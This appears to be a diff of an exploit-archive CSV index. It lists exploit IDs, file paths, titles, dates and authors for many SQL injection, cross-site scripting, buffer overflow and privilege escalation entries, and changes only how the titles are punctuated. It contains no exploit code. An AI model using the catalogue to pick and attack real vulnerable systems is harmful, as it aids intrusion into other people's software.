35407,platforms/php/webapps/35407.txt,"phpWebSite 1.7.1 - 'local' Parameter Cross-Site Scripting",2011-03-03,"AutoSec Tools",php,webapps,0 35408,platforms/php/webapps/35408.txt,"xtcModified 1.05 - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities",2011-03-03,"High-Tech Bridge SA",php,webapps,0 @@ -32011,7 +32011,7 @@ id,file,description,date,author,platform,type,port 35515,platforms/php/webapps/35515.txt,"Alkacon OpenCMS 7.5.x - Multiple Cross-Site Scripting Vulnerabilities",2011-03-28,antisnatchor,php,webapps,0 35516,platforms/php/webapps/35516.txt,"webEdition CMS 6.1.0.2 - 'DOCUMENT_ROOT' Parameter Local File Inclusion",2011-03-28,eidelweiss,php,webapps,0 35517,platforms/php/webapps/35517.txt,"pppBLOG 0.3 - 'search.php' Cross-Site Scripting",2011-03-28,"kurdish hackers team",php,webapps,0 -35557,platforms/php/webapps/35557.txt,"PHP-Fusion 'article_id' Parameter SQL Injection",2011-04-04,KedAns-Dz,php,webapps,0 +35557,platforms/php/webapps/35557.txt,"PHP-Fusion - 'article_id' Parameter SQL Injection",2011-04-04,KedAns-Dz,php,webapps,0 35519,platforms/lin_x86/shellcode/35519.txt,"Linux/x86 - rmdir shellcode (37 bytes)",2014-12-11,kw4,lin_x86,shellcode,0 35520,platforms/php/webapps/35520.txt,"Claroline 1.10 - Multiple HTML Injection Vulnerabilities",2011-03-28,"AutoSec Tools",php,webapps,0 35521,platforms/php/webapps/35521.txt,"osCSS 2.1 - Cross-Site Scripting / Multiple Local File Inclusion",2011-03-29,"AutoSec Tools",php,webapps,0 @@ -32092,10 +32092,10 @@ id,file,description,date,author,platform,type,port 35614,platforms/windows/remote/35614.c,"EC Software Help & Manual 5.5.1 Build 1296 - 'ijl15.dll' DLL Loading Arbitrary Code Execution",2011-04-14,LiquidWorm,windows,remote,0 35615,platforms/php/webapps/35615.txt,"PhpAlbum.net 0.4.1-14_fix06 - 'var3' Parameter Remote Command Execution",2011-04-14,"High-Tech Bridge SA",php,webapps,0 35616,platforms/php/webapps/35616.txt,"Agahi Advertisement CMS 4.0 - 'view_ad.php' SQL Injection",2011-04-15,"Sepehr Security Team",php,webapps,0 -35617,platforms/php/webapps/35617.txt,"Qianbo Enterprise Web Site Management System 'Keyword' Parameter Cross-Site Scripting",2011-04-14,d3c0der,php,webapps,0 -35618,platforms/php/webapps/35618.txt,"RunCMS 'partners' Module 'id' Parameter SQL Injection",2011-04-15,KedAns-Dz,php,webapps,0 +35617,platforms/php/webapps/35617.txt,"Qianbo Enterprise Web Site Management System - 'Keyword' Parameter Cross-Site Scripting",2011-04-14,d3c0der,php,webapps,0 +35618,platforms/php/webapps/35618.txt,"RunCMS 'partners' Module - 'id' Parameter SQL Injection",2011-04-15,KedAns-Dz,php,webapps,0 35619,platforms/php/webapps/35619.txt,"PhoenixCMS 1.7 - Local File Inclusion / SQL Injection",2011-04-15,KedAns-Dz,php,webapps,0 -35620,platforms/hardware/remote/35620.txt,"Technicolor THOMSON TG585v7 Wireless Router 'url' Parameter Cross-Site Scripting",2011-04-15,"Edgard Chammas",hardware,remote,0 +35620,platforms/hardware/remote/35620.txt,"Technicolor THOMSON TG585v7 Wireless Router - 'url' Parameter Cross-Site Scripting",2011-04-15,"Edgard Chammas",hardware,remote,0 35621,platforms/php/webapps/35621.txt,"4Images 1.7.9 - Multiple Remote File Inclusions / SQL Injection",2011-04-16,KedAns-Dz,php,webapps,0 35622,platforms/windows/dos/35622.txt,"Wickr Desktop 2.2.1 Windows - Denial of Service",2014-12-27,Vulnerability-Lab,windows,dos,0 35623,platforms/multiple/webapps/35623.txt,"Pimcore 3.0 / 2.3.0 CMS - SQL Injection",2014-12-27,Vulnerability-Lab,multiple,webapps,0 @@ -32120,7 +32120,7 @@ id,file,description,date,author,platform,type,port 35659,platforms/php/webapps/35659.txt,"Social Microblogging PRO 1.5 Stored XSS",2014-12-31,"Halil Dalabasmaz",php,webapps,80 35644,platforms/linux/remote/35644.txt,"Viola DVR VIO-4/1000 - Multiple Directory Traversal Vulnerabilities",2011-04-19,QSecure,linux,remote,0 35645,platforms/php/webapps/35645.txt,"Automagick Tube Script 1.4.4 - 'module' Parameter Cross-Site Scripting",2011-04-20,Kurd-Team,php,webapps,0 -35647,platforms/php/webapps/35647.txt,"SyCtel Design 'menu' Parameter Multiple Local File Inclusion",2011-04-21,"Ashiyane Digital Security Team",php,webapps,0 +35647,platforms/php/webapps/35647.txt,"SyCtel Design - 'menu' Parameter Multiple Local File Inclusion",2011-04-21,"Ashiyane Digital Security Team",php,webapps,0 35648,platforms/php/webapps/35648.txt,"Zenphoto 1.4.0.3 - '_zp_themeroot' Parameter Multiple Cross-Site Scripting Vulnerabilities",2011-04-21,"High-Tech Bridge SA",php,webapps,0 35649,platforms/php/webapps/35649.txt,"todoyu 2.0.8 - 'lang' Parameter Cross-Site Scripting",2011-04-22,"AutoSec Tools",php,webapps,0 35650,platforms/php/webapps/35650.py,"LightNEasy 3.2.3 - 'userhandle' Cookie Parameter SQL Injection",2011-04-21,"AutoSec Tools",php,webapps,0 @@ -32144,7 +32144,7 @@ id,file,description,date,author,platform,type,port 35670,platforms/php/webapps/35670.txt,"Absolut Engine 1.73 - Multiple Vulnerabilities",2015-01-01,"Steffen Rösemann",php,webapps,80 35671,platforms/windows/local/35671.rb,"i-FTP Schedule Buffer Overflow",2015-01-01,Metasploit,windows,local,0 35677,platforms/php/webapps/35677.txt,"eyeOS 1.9.0.2 Image File Handling HTML Injection",2011-04-25,"Alberto Ortega",php,webapps,0 -35678,platforms/php/webapps/35678.txt,"phpGraphy 0.9.13 b 'theme_dir' Parameter Cross-Site Scripting",2011-04-28,"High-Tech Bridge SA",php,webapps,0 +35678,platforms/php/webapps/35678.txt,"phpGraphy 0.9.13 b - 'theme_dir' Parameter Cross-Site Scripting",2011-04-28,"High-Tech Bridge SA",php,webapps,0 35679,platforms/php/webapps/35679.txt,"e107 2 Bootstrap CMS - XSS",2015-01-03,"Ahmet Agar / 0x97",php,webapps,0 35680,platforms/php/webapps/35680.txt,"ClanSphere 2011.0 - Local File Inclusion / Arbitrary File Upload",2011-04-28,KedAns-Dz,php,webapps,0 35681,platforms/linux/local/35681.txt,"OProfile 0.9.6 - 'opcontrol' Utility 'set_event()' Local Privilege Escalation",2011-04-29,"Stephane Chauveau",linux,local,0 @@ -32156,7 +32156,7 @@ id,file,description,date,author,platform,type,port 35688,platforms/hardware/remote/35688.py,"ASUSWRT 3.0.0.4.376_1071 - LAN Backdoor Command Execution",2015-01-04,"Friedrich Postelstorfer",hardware,remote,0 35699,platforms/php/webapps/35699.txt,"E2 Photo Gallery 0.9 - 'index.php' Cross-Site Scripting",2011-05-03,"High-Tech Bridge SA",php,webapps,0 35700,platforms/php/webapps/35700.txt,"YaPIG 0.95 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-03,"High-Tech Bridge SA",php,webapps,0 -35697,platforms/php/webapps/35697.txt,"Web Auction 0.3.6 'lang' Parameter Cross-Site Scripting",2011-05-03,"AutoSec Tools",php,webapps,0 +35697,platforms/php/webapps/35697.txt,"Web Auction 0.3.6 - 'lang' Parameter Cross-Site Scripting",2011-05-03,"AutoSec Tools",php,webapps,0 35698,platforms/cgi/webapps/35698.txt,"Proofpoint Protection Server 5.5.5 - 'process.cgi' Cross-Site Scripting",2011-05-03,"Karan Khosla",cgi,webapps,0 35694,platforms/windows/remote/35694.txt,"SkinCrafter3 vs2005 3.8.1.0 - Multiple ActiveX Buffer Overflows",2015-01-05,metacom,windows,remote,0 35691,platforms/php/webapps/35691.txt,"Crea8Social 2.0 - XSS Change Interface",2015-01-04,"Yudhistira B W",php,webapps,0 @@ -32164,7 +32164,7 @@ id,file,description,date,author,platform,type,port 35714,platforms/windows/remote/35714.pl,"BlueVoda Website Builder 11 - '.bvp' File Stack-Based Buffer Overflow",2011-05-09,KedAns-Dz,windows,remote,0 35712,platforms/windows/local/35712.rb,"BulletProof FTP Client - BPS Buffer Overflow",2015-01-06,Metasploit,windows,local,0 35701,platforms/php/webapps/35701.txt,"SelectaPix 1.4.1 - 'uploadername' Parameter Cross-Site Scripting",2011-05-03,"High-Tech Bridge SA",php,webapps,0 -35702,platforms/php/webapps/35702.txt,"Multiple GoT.MY Products 'theme_dir' Parameter Cross-Site Scripting",2011-05-03,Hector.x90,php,webapps,0 +35702,platforms/php/webapps/35702.txt,"Multiple GoT.MY Products - 'theme_dir' Parameter Cross-Site Scripting",2011-05-03,Hector.x90,php,webapps,0 35703,platforms/multiple/remote/35703.py,"sipdroid 2.2 SIP INVITE Response User Enumeration Weakness",2011-05-04,"Anibal Vaz Marques",multiple,remote,0 35704,platforms/php/webapps/35704.txt,"WP Ajax Calendar 1.0 - 'example.php' Cross-Site Scripting",2011-05-05,"High-Tech Bridge SA",php,webapps,0 35705,platforms/php/webapps/35705.txt,"PHP Directory Listing Script 3.1 - 'index.php' Cross-Site Scripting",2011-05-05,"High-Tech Bridge SA",php,webapps,0 @@ -32202,9 +32202,9 @@ id,file,description,date,author,platform,type,port 35740,platforms/windows/remote/35740.txt,"Microsoft .NET Framework JIT Compiler Optimization NULL String Remote Code Execution",2011-03-04,"Brian Mancini",windows,remote,0 35741,platforms/windows/local/35741.pl,"Palringo 2.8.1 - Stack Buffer Overflow (PoC)",2015-01-10,Mr.ALmfL9,windows,local,0 35742,platforms/osx/local/35742.c,"OS X 10.9.x - sysmond XPC Privilege Escalation",2015-01-10,"Google Security Research",osx,local,0 -35743,platforms/multiple/webapps/35743.txt,"Flash Tag Cloud And MT-Cumulus Plugin 'tagcloud' Parameter Cross-Site Scripting",2011-05-13,MustLive,multiple,webapps,0 +35743,platforms/multiple/webapps/35743.txt,"Flash Tag Cloud And MT-Cumulus Plugin - 'tagcloud' Parameter Cross-Site Scripting",2011-05-13,MustLive,multiple,webapps,0 35744,platforms/windows/remote/35744.pl,"AVS Ringtone Maker 1.6.1 - '.au' File Remote Buffer Overflow",2011-05-16,KedAns-Dz,windows,remote,0 -35745,platforms/php/webapps/35745.txt,"Joomla! 'com_cbcontact' Component 'contact_id' Parameter SQL Injection",2011-05-16,KedAns-Dz,php,webapps,0 +35745,platforms/php/webapps/35745.txt,"Joomla! 'com_cbcontact' Component - 'contact_id' Parameter SQL Injection",2011-05-16,KedAns-Dz,php,webapps,0 35746,platforms/linux/local/35746.sh,"RedStar 3.0 Desktop - Privilege Escalation (Enable sudo)",2015-01-11,"prdelka & ‏sfan55",linux,local,0 35747,platforms/hardware/webapps/35747.pl,"D-Link DSL-2730B Modem - XSS Injection Stored Exploit Wlsecrefresh.wl & Wlsecurity.wl",2015-01-11,"XLabs Security",hardware,webapps,0 35748,platforms/linux/local/35748.txt,"RedStar 2.0 Desktop - Privilege Escalation (World-writeable rc.sysinit)",2015-01-11,prdelka,linux,local,0 @@ -32246,7 +32246,7 @@ id,file,description,date,author,platform,type,port 35784,platforms/linux/remote/35784.php,"Zend Framework 1.11.4 - 'PDO_MySql' Security Bypass",2011-05-19,"Anthony Ferrara",linux,remote,0 35785,platforms/linux/remote/35785.txt,"klibc 1.5.2 DHCP Options Processing Remote Shell Command Execution",2011-05-18,"maximilian attems",linux,remote,0 35787,platforms/php/webapps/35787.txt,"LimeSurvey 1.85+ 'admin.php' Cross-Site Scripting",2011-05-19,"Juan Manuel Garcia",php,webapps,0 -35788,platforms/php/webapps/35788.txt,"Joomla! 'com_maplocator' Component 'cid' Parameter SQL Injection",2011-05-23,FL0RiX,php,webapps,0 +35788,platforms/php/webapps/35788.txt,"Joomla! 'com_maplocator' Component - 'cid' Parameter SQL Injection",2011-05-23,FL0RiX,php,webapps,0 35789,platforms/php/webapps/35789.txt,"phpScheduleIt 1.2.12 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-24,"High-Tech Bridge SA",php,webapps,0 35790,platforms/multiple/remote/35790.py,"Lumension Security Lumension Device Control 4.x Memory Corruption",2011-05-24,"Andy Davis",multiple,remote,0 35791,platforms/php/webapps/35791.txt,"Ajax Chat 1.0 - 'ajax-chat.php' Cross-Site Scripting",2011-05-24,"High-Tech Bridge SA",php,webapps,0 @@ -32297,7 +32297,7 @@ id,file,description,date,author,platform,type,port 35835,platforms/php/webapps/35835.txt,"WordPress GD Star Rating Plugin 'votes' Parameter - SQL Injection",2011-06-08,anonymous,php,webapps,0 35836,platforms/linux/remote/35836.pl,"Perl Data::FormValidator 4.66 Module 'results()' Security Bypass",2011-06-08,dst,linux,remote,0 35837,platforms/php/webapps/35837.html,"The Pacer Edition CMS 2.1 - 'email' Parameter Cross-Site Scripting",2011-06-07,LiquidWorm,php,webapps,0 -35838,platforms/php/webapps/35838.txt,"Tolinet Agencia 'id' Parameter SQL Injection",2011-06-10,"Andrea Bocchetti",php,webapps,0 +35838,platforms/php/webapps/35838.txt,"Tolinet Agencia - 'id' Parameter SQL Injection",2011-06-10,"Andrea Bocchetti",php,webapps,0 35839,platforms/php/webapps/35839.txt,"Joomla Minitek FAQ Book 1.3 - 'id' Parameter SQL Injection",2011-06-13,kaMtiEz,php,webapps,0 35840,platforms/php/webapps/35840.txt,"RedaxScript 2.1.0 - Privilege Escalation",2015-01-20,"shyamkumar somana",php,webapps,80 35842,platforms/windows/dos/35842.c,"MalwareBytes Anti-Exploit 1.03.1.1220/1.04.1.1012 Out-of-bounds Read DoS",2015-01-20,"Parvez Anwar",windows,dos,0 @@ -32312,7 +32312,7 @@ id,file,description,date,author,platform,type,port 35848,platforms/osx/local/35848.c,"OS X 10.9.5 IOKit IntelAccelerator NULL Pointer Dereference",2015-01-20,"Google Security Research",osx,local,0 35849,platforms/osx/dos/35849.c,"OS X 10.10 IOKit IntelAccelerator NULL Pointer Dereference",2015-01-20,"Google Security Research",osx,dos,0 35850,platforms/windows/local/35850.bat,"Microsoft Windows XP - 'tskill' Local Privilege Escalation",2011-06-13,"Todor Donev",windows,local,0 -35851,platforms/php/webapps/35851.txt,"WebFileExplorer 3.6 'user' and 'pass' SQL Injection",2011-06-13,pentesters.ir,php,webapps,0 +35851,platforms/php/webapps/35851.txt,"WebFileExplorer 3.6 - 'user' and 'pass' SQL Injection",2011-06-13,pentesters.ir,php,webapps,0 35852,platforms/asp/webapps/35852.txt,"Microsoft Lync Server 2010 - 'ReachJoin.aspx' Remote Command Injection",2011-06-13,"Mark Lachniet",asp,webapps,0 35853,platforms/php/webapps/35853.php,"PHP-Nuke 8.3 - 'upload.php' Arbitrary File Upload (1)",2011-06-13,pentesters.ir,php,webapps,0 35854,platforms/php/webapps/35854.pl,"PHP-Nuke 8.3 - 'upload.php' Arbitrary File Upload (2)",2011-06-13,pentesters.ir,php,webapps,0 @@ -32338,13 +32338,13 @@ id,file,description,date,author,platform,type,port 35874,platforms/php/webapps/35874.txt,"Eshop Manager Multiple SQL Injection",2011-06-22,"Number 7",php,webapps,0 35875,platforms/php/webapps/35875.txt,"FanUpdate 3.0 - 'pageTitle' Parameter Cross-Site Scripting",2011-06-22,"High-Tech Bridge SA",php,webapps,0 35876,platforms/windows/dos/35876.html,"Easewe FTP OCX ActiveX Control 4.5.0.9 - 'EaseWeFtp.ocx' Multiple Insecure Method Vulnerabilities",2011-06-22,"High-Tech Bridge SA",windows,dos,0 -35877,platforms/php/webapps/35877.txt,"Sitemagic CMS 'SMTpl' Parameter Directory Traversal",2011-06-23,"Andrea Bocchetti",php,webapps,0 +35877,platforms/php/webapps/35877.txt,"Sitemagic CMS - 'SMTpl' Parameter Directory Traversal",2011-06-23,"Andrea Bocchetti",php,webapps,0 35878,platforms/php/webapps/35878.txt,"ecommerceMajor - SQL Injection / Authentication bypass",2015-01-22,"Manish Tanwar",php,webapps,0 35879,platforms/php/webapps/35879.txt,"WordPress Cforms Plugin 14.7 - Remote Code Execution",2015-01-19,Zakhar,php,webapps,0 35880,platforms/windows/remote/35880.html,"LEADTOOLS Imaging LEADSmtp ActiveX Control 'SaveMessage()' Insecure Method",2011-06-23,"High-Tech Bridge SA",windows,remote,0 35881,platforms/windows/remote/35881.c,"xAurora 10.00 - 'RSRC32.DLL' DLL Loading Arbitrary Code Execution",2011-06-24,"Zer0 Thunder",windows,remote,0 -35882,platforms/php/webapps/35882.txt,"Nodesforum '_nodesforum_node' Parameter SQL Injection",2011-06-23,"Andrea Bocchetti",php,webapps,0 -35883,platforms/php/webapps/35883.txt,"Joomla! 'com_morfeoshow' Component 'idm' Parameter SQL Injection",2011-06-27,Th3.xin0x,php,webapps,0 +35882,platforms/php/webapps/35882.txt,"Nodesforum - '_nodesforum_node' Parameter SQL Injection",2011-06-23,"Andrea Bocchetti",php,webapps,0 +35883,platforms/php/webapps/35883.txt,"Joomla! 'com_morfeoshow' Component - 'idm' Parameter SQL Injection",2011-06-27,Th3.xin0x,php,webapps,0 35884,platforms/php/webapps/35884.txt,"Mambo CMS 4.6.x Multiple Cross-Site Scripting Vulnerabilities",2011-06-27,"Aung Khant",php,webapps,0 35885,platforms/windows/remote/35885.txt,"Ubisoft CoGSManager ActiveX Control 1.0.0.23 - 'Initialize()' Method Stack Buffer Overflow",2011-06-27,"Luigi Auriemma",windows,remote,0 35886,platforms/windows/remote/35886.txt,"Sybase Advantage Server 10.0.0.3 - 'ADS' Process Off By One Buffer Overflow",2011-06-27,"Luigi Auriemma",windows,remote,0 @@ -32387,16 +32387,16 @@ id,file,description,date,author,platform,type,port 35919,platforms/bsd/remote/35919.c,"NetBSD 5.1 - Multiple 'libc/net' Functions Stack Buffer Overflow",2011-07-01,"Maksymilian Arciemowicz",bsd,remote,0 35920,platforms/php/webapps/35920.txt,"WebCalendar 1.2.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-07-04,"Stefan Schurtz",php,webapps,0 35921,platforms/windows/remote/35921.html,"iMesh 10.0 - 'IMWebControl.dll' ActiveX Control Buffer Overflow",2011-07-04,KedAns-Dz,windows,remote,0 -35922,platforms/php/webapps/35922.txt,"Joomla! 'com_jr_tfb' Component 'controller' Parameter Local File Inclusion",2011-07-05,FL0RiX,php,webapps,0 +35922,platforms/php/webapps/35922.txt,"Joomla! 'com_jr_tfb' Component - 'controller' Parameter Local File Inclusion",2011-07-05,FL0RiX,php,webapps,0 35923,platforms/asp/webapps/35923.txt,"Paliz Portal Cross-Site Scripting and Multiple SQL Injection",2011-07-02,Net.Edit0r,asp,webapps,0 35924,platforms/windows/remote/35924.py,"ClearSCADA - Remote Authentication Bypass Exploit",2015-01-28,"Jeremy Brown",windows,remote,0 35925,platforms/hardware/remote/35925.txt,"Portech MV-372 VoIP Gateway Multiple Security Vulnerabilities",2011-07-05,"Zsolt Imre",hardware,remote,0 -35926,platforms/asp/webapps/35926.txt,"eTAWASOL 'id' Parameter SQL Injection",2011-07-03,Bl4ck.Viper,asp,webapps,0 +35926,platforms/asp/webapps/35926.txt,"eTAWASOL - 'id' Parameter SQL Injection",2011-07-03,Bl4ck.Viper,asp,webapps,0 35927,platforms/php/webapps/35927.txt,"Classified Script c-BrowseClassified URL Cross-Site Scripting",2011-07-05,"Raghavendra Karthik D",php,webapps,0 35928,platforms/windows/remote/35928.html,"Pro Softnet IDrive Online Backup 3.4.0 ActiveX SaveToFile() Arbitrary File Overwrite",2011-07-06,"High-Tech Bridge SA",windows,remote,0 35929,platforms/php/webapps/35929.txt,"Joomla! 'com_voj' Component SQL Injection",2011-07-08,CoBRa_21,php,webapps,0 -35930,platforms/php/webapps/35930.txt,"Prontus CMS 'page' Parameter Cross-Site Scripting",2011-07-11,Zerial,php,webapps,0 -35931,platforms/php/webapps/35931.txt,"ICMusic '1.2 music_id' Parameter SQL Injection",2011-07-11,kaMtiEz,php,webapps,0 +35930,platforms/php/webapps/35930.txt,"Prontus CMS - 'page' Parameter Cross-Site Scripting",2011-07-11,Zerial,php,webapps,0 +35931,platforms/php/webapps/35931.txt,"ICMusic 1.2 - 'music_id' Parameter SQL Injection",2011-07-11,kaMtiEz,php,webapps,0 35932,platforms/hardware/remote/35932.c,"VSAT Sailor 900 - Remote Exploit",2015-01-29,"Nicholas Lemonias",hardware,remote,0 35933,platforms/hardware/webapps/35933.txt,"ManageEngine Firewall Analyzer 8.0 - Directory Traversal / XSS",2015-01-29,"Sepahan TelCom IT Group",hardware,webapps,0 35934,platforms/osx/local/35934.txt,"OS X < 10.10.x - Gatekeeper bypass",2015-01-29,"Amplia Security Research",osx,local,0 @@ -32405,7 +32405,7 @@ id,file,description,date,author,platform,type,port 35938,platforms/freebsd/dos/35938.txt,"FreeBSD Kernel - Multiple Vulnerabilities",2015-01-29,"Core Security",freebsd,dos,0 35939,platforms/hardware/dos/35939.txt,"Alice Modem 1111 - 'rulename' Parameter Cross-Site Scripting / Denial of Service",2011-07-12,"Moritz Naumann",hardware,dos,0 35940,platforms/php/webapps/35940.txt,"Sphider 1.3.x Admin Panel Multiple SQL Injection",2011-07-12,"Karthik R",php,webapps,0 -35941,platforms/multiple/webapps/35941.txt,"Flowplayer 3.2.7 linkUrl' Parameter Cross-Site Scripting",2011-07-12,"Szymon Gruszecki",multiple,webapps,0 +35941,platforms/multiple/webapps/35941.txt,"Flowplayer 3.2.7 - 'linkUrl' Parameter Cross-Site Scripting",2011-07-12,"Szymon Gruszecki",multiple,webapps,0 35942,platforms/php/webapps/35942.txt,"TCExam 11.2.x Multiple Cross-Site Scripting Vulnerabilities",2011-07-13,"Gjoko Krstic",php,webapps,0 35943,platforms/php/webapps/35943.txt,"Chyrp 2.x admin/help.php Multiple Parameter XSS",2011-07-13,Wireghoul,php,webapps,0 35944,platforms/php/webapps/35944.txt,"Chyrp 2.x includes/javascript.php action Parameter XSS",2011-07-13,Wireghoul,php,webapps,0 @@ -32418,12 +32418,12 @@ id,file,description,date,author,platform,type,port 35951,platforms/linux/dos/35951.py,"Exim ESMTP 4.80 glibc gethostbyname - Denial of Service",2015-01-29,1n3,linux,dos,0 35954,platforms/php/webapps/35954.txt,"Auto Web Toolbox - 'id' Parameter SQL Injection",2011-07-15,Lazmania61,php,webapps,0 35953,platforms/windows/local/35953.c,"McAfee Data Loss Prevention Endpoint - Arbitrary Write Privilege Escalation",2015-01-30,"Parvez Anwar",windows,local,0 -35955,platforms/php/webapps/35955.txt,"Easy Estate Rental 's_location' Parameter SQL Injection",2011-07-15,Lazmania61,php,webapps,0 -35956,platforms/php/webapps/35956.txt,"Joomla Foto Component 'id_categoria' Parameter SQL Injection",2011-07-15,SOLVER,php,webapps,0 +35955,platforms/php/webapps/35955.txt,"Easy Estate Rental - 's_location' Parameter SQL Injection",2011-07-15,Lazmania61,php,webapps,0 +35956,platforms/php/webapps/35956.txt,"Joomla Foto Component - 'id_categoria' Parameter SQL Injection",2011-07-15,SOLVER,php,webapps,0 35957,platforms/linux/dos/35957.txt,"Linux Kernel 2.6.26 - Auerswald USB Device Driver Buffer Overflow (Proof of Concept)",2009-10-19,"R. Dominguez Veg",linux,dos,0 -35958,platforms/php/webapps/35958.txt,"Joomla Juicy Gallery Component 'picId' Parameter SQL Injection",2011-07-15,SOLVER,php,webapps,0 +35958,platforms/php/webapps/35958.txt,"Joomla Juicy Gallery Component - 'picId' Parameter SQL Injection",2011-07-15,SOLVER,php,webapps,0 35959,platforms/php/webapps/35959.txt,"Joomla! 'com_hospital' Component SQL Injection",2011-07-15,SOLVER,php,webapps,0 -35960,platforms/php/webapps/35960.txt,"Joomla Controller Component 'Itemid' Parameter SQL Injection",2011-07-15,SOLVER,php,webapps,0 +35960,platforms/php/webapps/35960.txt,"Joomla Controller Component - 'Itemid' Parameter SQL Injection",2011-07-15,SOLVER,php,webapps,0 35961,platforms/hp-ux/remote/35961.py,"HP Data Protector 8.x - Remote Command Execution",2015-01-30,"Juttikhun Khamchaiyaphum",hp-ux,remote,0 35962,platforms/windows/local/35962.c,"Trend Micro Multiple Products 8.0.1133 - Privilege Escalation",2015-01-31,"Parvez Anwar",windows,local,0 35987,platforms/php/webapps/35987.txt,"Support Incident Tracker (SiT!) 3.63 p1 search.php search_string Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0 @@ -32439,8 +32439,8 @@ id,file,description,date,author,platform,type,port 35973,platforms/php/webapps/35973.txt,"Joomla! 1.6.5 and Prior Multiple Cross-Site Scripting Vulnerabilities",2011-07-20,"YGN Ethical Hacker Group",php,webapps,0 35974,platforms/php/webapps/35974.txt,"Tiki Wiki CMS Groupware 7.2 - 'snarf_ajax.php' Cross-Site Scripting",2011-07-20,"High-Tech Bridge SA",php,webapps,0 35975,platforms/php/webapps/35975.txt,"Cyberoam UTM Multiple Cross-Site Scripting Vulnerabilities",2011-07-20,"Patrick Webster",php,webapps,0 -35976,platforms/php/webapps/35976.txt,"Synergy Software 'id' Parameter SQL Injection",2011-07-21,Ehsan_Hp200,php,webapps,0 -35977,platforms/php/webapps/35977.txt,"Godly Forums 'id' Parameter SQL Injection",2011-07-25,3spi0n,php,webapps,0 +35976,platforms/php/webapps/35976.txt,"Synergy Software - 'id' Parameter SQL Injection",2011-07-21,Ehsan_Hp200,php,webapps,0 +35977,platforms/php/webapps/35977.txt,"Godly Forums - 'id' Parameter SQL Injection",2011-07-25,3spi0n,php,webapps,0 35978,platforms/php/webapps/35978.txt,"Online Grades 3.2.5 - Multiple Cross-Site Scripting Vulnerabilities",2011-07-25,"Gjoko Krstic",php,webapps,0 35979,platforms/php/webapps/35979.txt,"Willscript Recipes Website Script Silver Edition 'viewRecipe.php' SQL Injection",2011-07-25,Lazmania61,php,webapps,0 36040,platforms/php/webapps/36040.txt,"Chamilo LMS 1.9.8 Blind SQL Injection",2015-02-09,"Kacper Szurek",php,webapps,80 @@ -32449,17 +32449,17 @@ id,file,description,date,author,platform,type,port 36002,platforms/jsp/webapps/36002.txt,"IBM Tivoli Service Automation Manager 7.2.4 - Remote Code Execution",2014-12-12,"Jakub Palaczynski",jsp,webapps,0 36003,platforms/php/webapps/36003.txt,"Curverider Elgg 1.7.9 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-01,"Aung Khant",php,webapps,0 36004,platforms/multiple/remote/36004.txt,"Skype 5.3 - 'Mobile Phone' Field HTML Injection",2011-08-01,noptrix,multiple,remote,0 -36005,platforms/php/webapps/36005.txt,"MyBB MyTabs Plugin 'tab' Parameter SQL Injection",2011-08-02,"AutoRUN and dR.sqL",php,webapps,0 +36005,platforms/php/webapps/36005.txt,"MyBB MyTabs Plugin - 'tab' Parameter SQL Injection",2011-08-02,"AutoRUN and dR.sqL",php,webapps,0 36006,platforms/multiple/remote/36006.java,"Open Handset Alliance Android 2.3.4/3.1 - Browser Sandbox Security Bypass",2011-08-02,"Roee Hay",multiple,remote,0 36007,platforms/multiple/dos/36007.txt,"AzeoTech DAQFactory Denial of Service",2011-06-24,"Knud Erik Hojgaard",multiple,dos,0 36008,platforms/php/webapps/36008.txt,"Gilnet News 'read_more.php' SQL Injection",2011-07-11,Err0R,php,webapps,0 -36009,platforms/php/webapps/36009.txt,"mt LinkDatenbank 'b' Parameter Cross-Site Scripting",2011-08-03,Err0R,php,webapps,0 +36009,platforms/php/webapps/36009.txt,"mt LinkDatenbank - 'b' Parameter Cross-Site Scripting",2011-08-03,Err0R,php,webapps,0 36010,platforms/asp/webapps/36010.txt,"BESNI OKUL PORTAL 'sayfa.asp' Cross-Site Scripting",2011-08-03,Err0R,asp,webapps,0 36011,platforms/asp/webapps/36011.txt,"Ataccan E-ticaret Scripti - 'id' Parameter SQL Injection",2011-08-03,Err0R,asp,webapps,0 -36012,platforms/php/webapps/36012.txt,"Joomla! Slideshow Gallery Component 'id' Parameter SQL Injection",2011-08-03,"Ne0 H4ck3R",php,webapps,0 +36012,platforms/php/webapps/36012.txt,"Joomla! Slideshow Gallery Component - 'id' Parameter SQL Injection",2011-08-03,"Ne0 H4ck3R",php,webapps,0 36013,platforms/multiple/remote/36013.txt,"foomatic-gui python-foomatic 0.7.9.4 - 'pysmb.py' Remote Arbitrary Shell Command Execution",2011-08-03,daveb,multiple,remote,0 36014,platforms/hardware/remote/36014.pl,"LG DVR LE6016D - Unauthenticated Remote Users/Passwords Disclosure exploit",2015-02-07,"Todor Donev",hardware,remote,0 -36015,platforms/php/webapps/36015.txt,"Joomla! 'com_community' Component 'userid' Parameter SQL Injection",2011-08-03,"Ne0 H4ck3R",php,webapps,0 +36015,platforms/php/webapps/36015.txt,"Joomla! 'com_community' Component - 'userid' Parameter SQL Injection",2011-08-03,"Ne0 H4ck3R",php,webapps,0 36016,platforms/multiple/remote/36016.txt,"Xpdf 3.02-13 - 'zxpdf' Security Bypass",2011-08-04,"Chung-chieh Shan",multiple,remote,0 36017,platforms/php/webapps/36017.txt,"HESK 2.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-03,"High-Tech Bridge SA",php,webapps,0 36018,platforms/php/webapps/36018.txt,"WordPress WP e-Commerce Plugin 3.8.6 - 'cart_messages[]' Parameter Cross-Site Scripting",2011-08-04,"High-Tech Bridge SA",php,webapps,0 @@ -32488,7 +32488,7 @@ id,file,description,date,author,platform,type,port 36043,platforms/php/webapps/36043.rb,"WordPress WP EasyCart Plugin - Unrestricted File Upload",2015-02-10,Metasploit,php,webapps,80 36044,platforms/php/webapps/36044.txt,"PHP Flat File Guestbook 1.0 - 'ffgb_admin.php' Remote File Inclusion",2011-08-11,"RiRes Walid",php,webapps,0 36045,platforms/cgi/remote/36045.txt,"SurgeFTP 23b6 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-16,"Houssam Sahli",cgi,remote,0 -36046,platforms/php/webapps/36046.txt,"phpWebSite 'page_id' Parameter Cross-Site Scripting",2011-08-17,Ehsan_Hp200,php,webapps,0 +36046,platforms/php/webapps/36046.txt,"phpWebSite - 'page_id' Parameter Cross-Site 